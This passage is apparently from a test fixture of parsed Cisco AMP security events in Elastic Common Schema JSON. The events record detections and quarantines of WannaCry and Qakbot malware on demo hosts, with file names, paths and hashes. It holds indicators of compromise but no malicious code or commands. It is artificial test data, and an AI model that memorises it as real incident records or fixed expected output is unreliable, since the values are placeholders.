"7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": 
"u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 8409, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 1008, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229331435814970", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 73000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": 
"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 9938, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814968", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 26000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + 
"input.type": "log", + "log.offset": 11210, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847660", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 12488, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + 
"cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229327140847658", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 13608, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:05.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 166000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229331435815000, 
+ "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14728, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419229327140847671", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 870000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 15848, + 
"related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847666", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 17121, + "process.hash.md5": "ad7b9c14083b52bc532fba5948342b98", + "process.hash.sha1": 
"ee8cbf12d87c4d388f09b4f69bed2e91682920b5", + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "process.name": "cmd.exe", + "process.pid": 5748, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419229327140847665", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 667000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 18745, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 4772, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:04.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229327140847656", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 28000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229327140848000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 20287, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:41:03.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419229322845880359", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 950000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419229322845880000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + 
"file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 21793, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + 
"file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 23391, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 24592, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + 
"@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 913000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 25793, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056775", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + 
"f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "qYf.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 26906, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056774", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + 
"file.name": "4191700.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 28140, + "related.hash": [ + "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T14:37:40.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DD6D4FEDD3-100.SBX.TG", + "cisco.amp.detection_id": "6411488666497056773", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 398000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411488666497057000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": 
